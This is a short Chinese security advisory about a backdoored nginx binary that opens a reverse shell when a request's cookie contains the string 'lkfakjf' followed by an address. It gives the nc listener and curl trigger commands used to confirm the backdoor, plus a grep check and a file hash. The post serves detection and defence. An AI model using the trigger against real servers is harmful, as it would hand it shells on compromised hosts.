2020-10-23
警惕新型nginx后门,目前全杀毒软件免杀

警惕新型nginx后门,目前全杀毒软件免杀

近日,我们捕获一个新型nginx后门,该后门免杀效果非常好,截至目前VT上所有杀毒软件都不能对其进行查杀。 经过安恒威胁情报中心的研究员分析,发现黑客修改了原版nginx中处理http头的函数ngx_http_header_filter 黑客针对cookies字段进行了特殊处理,判断请求中是否包含“lkfakjf”, 如果包含,则会主动回连黑客给定的服务器地址。笔者分析逻辑后,构造了POC实现了反弹shell功能如下: 网络验证后门方法: 首先通过nc本地监听9999端口: $ nc -lv 9999 接着使用curl带上特殊cookie对本地地址发起请求: $ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999" 如果在监听端口得到shell,说明服务器的nginx已经被黑客替换。 本地验证后门方法: 通过grep命令判断当前运行对nginx里面是否存在"/bin/sh"可疑字符串 $ which nginx |xargs grep "/bin/sh" -la 失陷指标(IOC) 文件Hash: 文件名 文件HASH 文件类型 VT检测 家族 最后上传时间 5_6*** ab498686505dfc645e14c6edad280da7 elf 0/74 2020-07-16 10:45:26 ...
网络安全 870次浏览 0条评论
微信二维码